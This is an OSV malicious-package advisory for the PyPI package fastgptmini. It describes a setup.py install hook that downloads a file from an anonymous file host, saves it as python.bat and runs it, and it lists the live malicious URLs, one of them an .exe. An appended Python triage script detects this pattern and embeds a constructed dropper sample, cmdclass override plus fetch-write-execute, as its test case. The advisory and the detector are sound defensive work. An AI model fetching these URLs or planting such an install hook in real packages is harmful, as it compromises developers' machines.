{
  "id":"MAL-2026-5776",
  "summary":"Malicious code in fastgptmini (PyPI)",
  "details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (4da10d62527ca4b69f4458b6a01c77f01af42c5a1631d5cc6f207070d1ade20d)\nsetup.py fetches an opaque file from https://tmpfiles.org/dl/wJwhUXDhUK6M/zvgfsj.txt (an anonymous, throwaway file-sharing host) during `pip install`, writes the bytes to `python.bat` in the current working directory, and executes them via `os.system(\"cmd /c python.bat\")`. The URL is unpinned, no hash or signature verification is performed, the destination is not associated with the package publisher, and the fetched content is handed directly to a shell — a canonical install-time dropper. The package ships no real functionality (src/ contains only the egg-info directory) and uses placeholder metadata (Name/Author/Summary all set to 'FastGPTMini' with no homepage, URL, or email), consistent with a name-confusion lure targeting developers searching for FastGPT/GPT tooling. Any machine running `pip install FastGPTMini` will fetch and execute attacker-controlled code with the user's privileges.\n\n## Source: kam193 (3cca907106c3dceb5276e9bdbf8799367b44df9e12fe12098dd3ed215bb4f3b0)\nDuring installation, the code downloads an obfuscated script, which attempts to tamper with Defender exclusion paths and then downloads a malicious executable.\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-06-fastgptmini\n\n\nReasons (based on the campaign):\n\n\n - Downloads and executes a remote executable.\n\n\n - malware\n\n\n - The package overrides the install command in setup.py to execute malicious code during installation.\n\n\n - obfuscation\n",
  "modified":"2026-06-15T20:31:52.949884316Z",
  "published":"2026-06-15T11:43:18Z",
  "database_specific":{
    "iocs":{"urls":["https://tmpfiles.org/dl/wNwdULF0K8NS/vwchmx.txt","https://tmpfiles.org/dl/wowPUtiVvUPO/pythoninstallmanager.exe"]},
    "malicious-packages-origins":[
      {"modified_time":"2026-06-15T12:23:54.586979Z","sha256":"3cca907106c3dceb5276e9bdbf8799367b44df9e12fe12098dd3ed215bb4f3b0","source":"kam193","id":"pypi/2026-06-fastgptmini/fastgptmini","import_time":"2026-06-15T13:06:39.495068017Z","versions":["2.21","2.22","2.23","2.24","2.25","2.26"]},
      {"modified_time":"2026-06-15T19:39:35Z","id":"IN-MAL-2026-006679","source":"amazon-inspector","import_time":"2026-06-15T20:14:26.914309651Z","sha256":"28e21a2c3a141d093fb5d40a6cbf4af6a856d1e62e20d21040196f0f04046d7f","versions":["2.22"]},
      {"modified_time":"2026-06-15T19:55:46Z","id":"IN-MAL-2026-006693","source":"amazon-inspector","import_time":"2026-06-15T20:14:28.473782815Z","sha256":"4da10d62527ca4b69f4458b6a01c77f01af42c5a1631d5cc6f207070d1ade20d","versions":["2.26"]},
      {"modified_time":"2026-06-15T19:39:39Z","id":"IN-MAL-2026-006680","source":"amazon-inspector","import_time":"2026-06-15T20:14:27.050979451Z","sha256":"9d3e5a3d5306955d64796726515b3fbdc69c4a62764e8eee47f1e31a46b4e612","versions":["2.23"]},
      {"modified_time":"2026-06-15T19:39:35Z","sha256":"df96c79ac17a09accf2decd6e2be75665cd05dee4eb6f3fe1ee78eb1d6aae9c7","source":"amazon-inspector","id":"IN-MAL-2026-006678","import_time":"2026-06-15T20:14:26.788022703Z","versions":["2.21"]}
    ]
  },
  "references":[
    {"type":"WEB","url":"https://www.virustotal.com/gui/file-analysis/ZjYxZmY4ZjFhNjIxMzI2ZTY1NmUxNThkMWNlYTE0M2M6MTc4MTUyMzQzMw=="},
    {"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/9e731bb85408c1b34c5f7fd6518b3590983ac5e95793dee0f1af390ac288ed47/detection"},
    {"type":"WEB","url":"https://bad-packages.kam193.eu/pypi/package/fastgptmini"},
    {"type":"PACKAGE","url":"https://pypi.org/project/FastGPTMini/2.22/"},
    {"type":"PACKAGE","url":"https://pypi.org/project/FastGPTMini/2.26/"},
    {"type":"PACKAGE","url":"https://pypi.org/project/FastGPTMini/2.23/"},
    {"type":"PACKAGE","url":"https://pypi.org/project/FastGPTMini/2.21/"}
  ],
  "affected":[
    {
      "package":{"name":"fastgptmini","ecosystem":"PyPI","purl":"pkg:pypi/fastgptmini"},
      "versions":["2.21","2.22","2.23","2.24","2.25","2.26"],
      "database_specific":{
        "source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/fastgptmini/MAL-2026-5776.json",
        "indicators":{
          "package_integrity":[
            {"hashes":{"md5":"36ffafaeb08cd85eafdb3fff1b7aa053","sha256":"0951171af0b78d98646657f3f98f80ddf51b13af91f60ebcb7341b635b55cf6b","blake2b_256":"d3d14c8dde385b27d5e2bf125e86aa05aa72baad390dfbaf13548530e844e09f"},"filename":"fastgptmini-2.26.tar.gz"}
          ],
          "evidence_files":[
            {"sha256":"7bc82bfa873cf8b125fb9a41fcc3238f3a8ac037a66f48e766dc308bbfd7f71a","tlsh":"d1116347ddd2a69812e0644c98119850ffa0836b2a40888bf1bd827cbfb42e086374a8","path":"setup.py"}
          ]
        },
        "cwes":[
          {"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},
          {"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},
          {"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},
          {"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}
        ]
      }
    }
  ],
  "schema_version":"1.7.5",
  "credits":[
    {"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},
    {"name":"Kamil Mańkowski (kam193)","contact":["https://github.com/kam193","https://bad-packages.kam193.eu/"],"type":"REPORTER"}
  ]
}
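The two source write-ups above describe the same install-time dropper shape: setup.py overrides the install command, fetches an unpinned file over HTTP during `pip install`, writes the bytes to a `.bat` script and hands that script to `os.system`. Added here as a worked example (not code from the advisory, from Amazon Inspector or kam193, or from the package itself) is a small static triage script that walks a sdist's setup.py with Python's `ast` module and flags exactly those four behaviours, so a reviewer can run it over an unpacked sdist before installing. The two setup.py samples embedded in it are constructed for the example; the URL in them is a placeholder (`example.invalid`), not the real IOC, and the `Dropper` class name is invented.

```python
"""Static triage of a sdist's setup.py for install-time dropper behaviour (added example)."""
import ast
from dataclasses import dataclass

# Leaf names of common fetch helpers (urllib.request.urlopen, requests.get, ...)
NETWORK_CALLS = {"urlopen", "urlretrieve", "get", "post", "request"}
# Leaf names of shell hand-offs under os.* / subprocess.*
SHELL_CALLS = {"system", "popen", "call", "run", "Popen", "check_output", "check_call"}
# File suffixes that mean "this write produced something executable"
EXEC_SUFFIXES = (".bat", ".cmd", ".exe", ".ps1", ".vbs", ".sh")
# setuptools commands a package can hijack to run code at install time
HOOKABLE_COMMANDS = ("install", "develop", "egg_info", "build_py")


@dataclass(frozen=True)
class Finding:
    line: int
    kind: str
    detail: str


def _call_name(node: ast.Call) -> str:
    """Dotted name of a call target, e.g. 'os.system' or 'urllib.request.urlopen'."""
    parts = []
    f = node.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if isinstance(f, ast.Name):
        parts.append(f.id)
    return ".".join(reversed(parts))


def _string_args(node: ast.Call) -> list[str]:
    """All string literals passed positionally or by keyword to the call."""
    vals = list(node.args) + [k.value for k in node.keywords]
    return [v.value for v in vals if isinstance(v, ast.Constant) and isinstance(v.value, str)]


def triage_setup_py(source: str) -> list[Finding]:
    """Return findings for network fetch, executable write, shell exec and cmdclass hijack."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        leaf = name.rsplit(".", 1)[-1]
        strings = _string_args(node)
        urls = [s for s in strings if s.startswith(("http://", "https://"))]
        if leaf in NETWORK_CALLS and urls:
            # Unpinned fetch at import/install time: no hash, no signature, remote-controlled bytes.
            findings.append(Finding(node.lineno, "network-fetch", f"{name} -> {urls[0]}"))
        elif leaf == "open" and any(s.lower().endswith(EXEC_SUFFIXES) for s in strings):
            findings.append(Finding(node.lineno, "writes-executable", f"open({strings[0]!r})"))
        elif leaf in SHELL_CALLS and name.startswith(("os.", "subprocess.")):
            detail = f"{name}({strings[0]!r})" if strings else name
            findings.append(Finding(node.lineno, "shell-exec", detail))
        elif leaf == "setup":
            for kw in node.keywords:
                if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                    for key in kw.value.keys:
                        if isinstance(key, ast.Constant) and key.value in HOOKABLE_COMMANDS:
                            findings.append(Finding(node.lineno, "cmdclass-override", f"cmdclass[{key.value!r}]"))
    return sorted(findings, key=lambda f: f.line)


def is_install_time_dropper(findings: list[Finding]) -> bool:
    """The advisory's pattern: remote bytes fetched and then executed or written as a script."""
    kinds = {f.kind for f in findings}
    return "network-fetch" in kinds and ("shell-exec" in kinds or "writes-executable" in kinds)


# Constructed sample with the same shape the advisory describes (placeholder URL, not the real IOC).
DROPPER_SETUP_PY = '''
import os
import urllib.request
from setuptools import setup
from setuptools.command.install import install

class Dropper(install):
    def run(self):
        install.run(self)
        data = urllib.request.urlopen("https://example.invalid/dl/abcdef/payload.txt").read()
        with open("python.bat", "wb") as fh:
            fh.write(data)
        os.system("cmd /c python.bat")

setup(name="FastGPTMini", version="0.0", cmdclass={"install": Dropper})
'''

# Constructed benign sample: a project URL in metadata is not a fetch and must not be flagged.
BENIGN_SETUP_PY = '''
from setuptools import setup

setup(
    name="example-lib",
    version="1.0",
    packages=["example_lib"],
    url="https://example.invalid/example-lib",
)
'''

if __name__ == "__main__":
    for label, src in (("dropper", DROPPER_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        found = triage_setup_py(src)
        print(f"{label}: dropper={is_install_time_dropper(found)}")
        for f in found:
            print(f"  line {f.line:>2}  {f.kind:<18} {f.detail}")
```

Run it against the `setup.py` of an unpacked sdist (`pip download --no-deps --no-binary :all: <pkg>` then `tar xzf`) rather than against an installed package; by the time `pip install` has finished, the hook has already run. The check is deliberately syntactic, so an obfuscated setup.py that builds the URL or the shell command at runtime will only trip the `cmdclass-override` and `shell-exec` signals, which is still enough to stop and read the file by hand.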